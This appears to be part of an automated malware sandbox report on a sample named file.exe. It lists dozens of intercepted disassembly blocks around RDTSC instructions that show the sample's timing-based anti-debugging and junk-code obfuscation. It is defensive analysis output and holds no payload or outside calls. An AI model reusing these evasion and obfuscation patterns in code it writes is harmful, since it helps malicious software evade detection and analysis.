Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 138FA11 second address: 138FA4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 nop 0x00000008 xor ecx, 35F3DBB1h 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push edi 0x00000013 call 00007F65A4502598h 0x00000018 pop edi 0x00000019 mov dword ptr [esp+04h], edi 0x0000001d add dword ptr [esp+04h], 00000017h 0x00000025 inc edi 0x00000026 push edi 0x00000027 ret 0x00000028 pop edi 0x00000029 ret 0x0000002a push 7BD7BA70h 0x0000002f pushad 0x00000030 push eax 0x00000031 push edx 0x00000032 ja 00007F65A4502596h 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 138FA4E second address: 138FAD2 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F65A4C18F96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b jmp 00007F65A4C18FA7h 0x00000010 pop ecx 0x00000011 popad 0x00000012 xor dword ptr [esp], 7BD7BAF0h 0x00000019 sbb ecx, 036391D5h 0x0000001f push 00000003h 0x00000021 xor si, A262h 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push eax 0x0000002b call 00007F65A4C18F98h 0x00000030 pop eax 0x00000031 mov dword ptr [esp+04h], eax 0x00000035 add dword ptr [esp+04h], 00000014h 0x0000003d inc eax 0x0000003e push eax 0x0000003f ret 0x00000040 pop eax 0x00000041 ret 0x00000042 push 00000003h 0x00000044 jp 00007F65A4C18F9Ch 0x0000004a mov ecx, dword ptr [ebp+122D2C80h] 0x00000050 call 00007F65A4C18F99h 0x00000055 push ebx 0x00000056 pushad 0x00000057 pushad 0x00000058 popad 0x00000059 pushad 0x0000005a popad 0x0000005b popad 0x0000005c pop ebx 0x0000005d push eax 0x0000005e js 00007F65A4C18FA4h 0x00000064 push eax 0x00000065 push edx 0x00000066 js 00007F65A4C18F96h 0x0000006c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 138FAD2 second address: 138FB05 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jmp 00007F65A45025A6h 0x0000000f mov eax, dword ptr [eax] 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F65A450259Fh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 138FB05 second address: 138FB79 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65A4C18FA5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d jmp 00007F65A4C18F9Dh 0x00000012 pop eax 0x00000013 push 00000000h 0x00000015 push eax 0x00000016 call 00007F65A4C18F98h 0x0000001b pop eax 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 add dword ptr [esp+04h], 0000001Ah 0x00000028 inc eax 0x00000029 push eax 0x0000002a ret 0x0000002b pop eax 0x0000002c ret 0x0000002d xor dh, 00000074h 0x00000030 stc 0x00000031 lea ebx, dword ptr [ebp+12451770h] 0x00000037 jmp 00007F65A4C18FA2h 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 jno 00007F65A4C18F96h 0x00000047 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138FB79 second address: 138FB83 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F65A4502596h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138FC06 second address: 138FC4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 add dword ptr [ebp+122D33A2h], edi 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007F65A4C18F98h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 0000001Ah 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 cld 0x0000002a push 8B8C25AEh 0x0000002f push eax 0x00000030 push edx 0x00000031 push ebx 0x00000032 jmp 00007F65A4C18F9Ch 0x00000037 pop ebx 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138FC4D second address: 138FCA6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65A450259Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 7473DAD2h 0x00000010 mov cl, 05h 0x00000012 push 00000003h 0x00000014 push 00000000h 0x00000016 push ecx 0x00000017 call 00007F65A4502598h 0x0000001c pop ecx 0x0000001d mov dword ptr [esp+04h], ecx 0x00000021 add dword ptr [esp+04h], 00000017h 0x00000029 inc ecx 0x0000002a push ecx 0x0000002b ret 0x0000002c pop ecx 0x0000002d ret 0x0000002e push 00000000h 0x00000030 mov dword ptr [ebp+122D1FBAh], eax 0x00000036 push 00000003h 0x00000038 xor dword ptr [ebp+122D37ADh], ecx 0x0000003e push 9378774Dh 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 je 00007F65A4502596h 0x0000004c push esi 0x0000004d pop esi 0x0000004e popad 0x0000004f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138FCA6 second address: 138FCB0 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F65A4C18F9Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AF1D6 second address: 13AF1DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AF1DC second address: 13AF1E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AF347 second address: 13AF364 instructions: 0x00000000 rdtsc 0x00000002 je 00007F65A4502598h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F65A450259Ch 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AF364 second address: 13AF368 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13AFCC0 second address: 13AFCCA instructions: 0x00000000 rdtsc 0x00000002 js 00007F65A4502596h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B0137 second address: 13B0151 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F65A4C18FA1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B02BE second address: 13B02CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007F65A4502596h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B02CE second address: 13B02D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A5B85 second address: 13A5B89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A5B89 second address: 13A5B99 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65A4C18F9Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A5B99 second address: 13A5BA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F65A4502596h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13A5BA5 second address: 13A5BA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B09F3 second address: 13B0A02 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F65A4502596h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B0A02 second address: 13B0A26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push esi 0x00000009 jmp 00007F65A4C18FA8h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B0A26 second address: 13B0A32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F65A4502596h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B0CBF second address: 13B0CC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B5261 second address: 13B5271 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jl 00007F65A450259Eh 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B5271 second address: 13B527F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007F65A4C18F96h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B527F second address: 13B5283 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1388461 second address: 1388465 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B9720 second address: 13B9726 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B9726 second address: 13B9738 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F65A4C18F98h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c pushad 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B9738 second address: 13B9762 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 jmp 00007F65A45025A8h 0x0000000d popad 0x0000000e popad 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push ecx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BD66F second address: 13BD680 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jbe 00007F65A4C18F96h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BDC58 second address: 13BDC5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C01BF second address: 13C01EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65A4C18F9Fh 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007F65A4C18FA8h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C03DF second address: 13C03E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C03E3 second address: 13C03ED instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C03ED second address: 13C03F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C0A5E second address: 13C0A63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C0A8E second address: 13C0A92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C0A92 second address: 13C0A96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C0A96 second address: 13C0A9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C0A9C second address: 13C0ADF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jg 00007F65A4C18F9Eh 0x0000000f jnl 00007F65A4C18F98h 0x00000015 xchg eax, ebx 0x00000016 sub dword ptr [ebp+12475683h], ecx 0x0000001c nop 0x0000001d pushad 0x0000001e pushad 0x0000001f jnl 00007F65A4C18F96h 0x00000025 jp 00007F65A4C18F96h 0x0000002b popad 0x0000002c jmp 00007F65A4C18F9Ah 0x00000031 popad 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 jnp 00007F65A4C18F96h 0x0000003c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C0D10 second address: 13C0D15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C0DB6 second address: 13C0DC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F65A4C18F96h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C1049 second address: 13C105F instructions: 0x00000000 rdtsc 0x00000002 jc 00007F65A450259Ch 0x00000008 jnp 00007F65A4502596h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C105F second address: 13C1064 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C1DA0 second address: 13C1DA6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C1DA6 second address: 13C1DAB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C2FBF second address: 13C3017 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F65A450259Ah 0x0000000b popad 0x0000000c push eax 0x0000000d push edi 0x0000000e jmp 00007F65A45025A0h 0x00000013 pop edi 0x00000014 nop 0x00000015 movzx edi, si 0x00000018 push 00000000h 0x0000001a movsx esi, di 0x0000001d push 00000000h 0x0000001f jmp 00007F65A450259Dh 0x00000024 xchg eax, ebx 0x00000025 jmp 00007F65A45025A0h 0x0000002a push eax 0x0000002b push eax 0x0000002c push edx 0x0000002d jl 00007F65A4502598h 0x00000033 push edi 0x00000034 pop edi 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C3B65 second address: 13C3BC2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 jmp 00007F65A4C18F9Fh 0x0000000d nop 0x0000000e add dword ptr [ebp+122D362Eh], ebx 0x00000014 mov dword ptr [ebp+122D2758h], ecx 0x0000001a push 00000000h 0x0000001c pushad 0x0000001d jbe 00007F65A4C18FAEh 0x00000023 call 00007F65A4C18FA7h 0x00000028 pop eax 0x00000029 mov cx, 4E83h 0x0000002d popad 0x0000002e push 00000000h 0x00000030 xor dword ptr [ebp+122D3153h], ecx 0x00000036 xchg eax, ebx 0x00000037 push eax 0x00000038 push edx 0x00000039 jbe 00007F65A4C18F98h 0x0000003f pushad 0x00000040 popad 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C3BC2 second address: 13C3BDC instructions: 0x00000000 rdtsc 0x00000002 jl 00007F65A45025A0h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C3BDC second address: 13C3BE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C3BE3 second address: 13C3BEE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F65A4502596h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C4531 second address: 13C453B instructions: 0x00000000 rdtsc 0x00000002 jo 00007F65A4C18F9Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C4F9A second address: 13C4FAC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F65A450259Ah 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C59FF second address: 13C5A05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C64CD second address: 13C64E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jo 00007F65A4502598h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 jne 00007F65A4502596h 0x00000018 pop esi 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C658A second address: 13C658E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C658E second address: 13C65A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007F65A450259Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C65A0 second address: 13C65A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C6284 second address: 13C629C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007F65A450259Bh 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C850A second address: 13C850E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C85B6 second address: 13C85BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C6DAC second address: 13C6DB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C85BC second address: 13C85C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C6DB9 second address: 13C6DC7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F65A4C18F96h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C85C0 second address: 13C85C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C960C second address: 13C9610 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CA532 second address: 13CA537 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C974A second address: 13C976C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65A4C18FA7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CA537 second address: 13CA5E0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F65A45025A2h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007F65A4502598h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 00000019h 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 push esi 0x00000029 mov bh, FDh 0x0000002b pop ebx 0x0000002c sub dword ptr [ebp+122D17D0h], ebx 0x00000032 push 00000000h 0x00000034 sub ebx, dword ptr [ebp+12452F30h] 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push ecx 0x0000003f call 00007F65A4502598h 0x00000044 pop ecx 0x00000045 mov dword ptr [esp+04h], ecx 0x00000049 add dword ptr [esp+04h], 0000001Dh 0x00000051 inc ecx 0x00000052 push ecx 0x00000053 ret 0x00000054 pop ecx 0x00000055 ret 0x00000056 jmp 00007F65A45025A5h 0x0000005b xchg eax, esi 0x0000005c jmp 00007F65A45025A3h 0x00000061 push eax 0x00000062 push eax 0x00000063 push edx 0x00000064 jns 00007F65A4502598h 0x0000006a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C976C second address: 13C9770 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C9770 second address: 13C97D2 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F65A4502596h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b nop 0x0000000c mov bh, FAh 0x0000000e push dword ptr fs:[00000000h] 0x00000015 adc bx, 6D25h 0x0000001a mov dword ptr fs:[00000000h], esp 0x00000021 mov bx, cx 0x00000024 mov eax, dword ptr [ebp+122D0C4Dh] 0x0000002a push 00000000h 0x0000002c push ebp 0x0000002d call 00007F65A4502598h 0x00000032 pop ebp 0x00000033 mov dword ptr [esp+04h], ebp 0x00000037 add dword ptr [esp+04h], 00000018h 0x0000003f inc ebp 0x00000040 push ebp 0x00000041 ret 0x00000042 pop ebp 0x00000043 ret 0x00000044 add bl, 00000079h 0x00000047 push FFFFFFFFh 0x00000049 jg 00007F65A4502598h 0x0000004f nop 0x00000050 push eax 0x00000051 push edx 0x00000052 jp 00007F65A4502598h 0x00000058 pushad 0x00000059 popad 0x0000005a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C97D2 second address: 13C97D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CB65E second address: 13CB68A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65A45025A6h 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F65A450259Eh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C97D8 second address: 13C97DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CB68A second address: 13CB694 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F65A4502596h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CB7F7 second address: 13CB7FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CB8D5 second address: 13CB8D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CB8D9 second address: 13CB8DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
